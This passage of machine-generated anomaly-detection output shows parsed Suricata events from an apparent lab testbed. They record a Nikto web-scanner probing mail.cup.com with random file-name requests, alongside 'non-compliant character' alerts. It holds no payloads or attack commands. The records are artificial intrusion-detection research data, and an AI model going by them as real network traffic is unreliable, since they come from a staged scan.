"\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46902, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2081933841044299, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80", "/parser/model/time": 1583349514.303601, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46904, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ca", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.303839, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46904, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1429962100481725, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80", "/parser/model/time": 1583349514.305461, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46906, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.fhp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30569, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46906, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1947518544553551, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80", "/parser/model/time": 1583349514.30769, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46908, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.00RelNotes", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.307877, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2147479336955668,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", 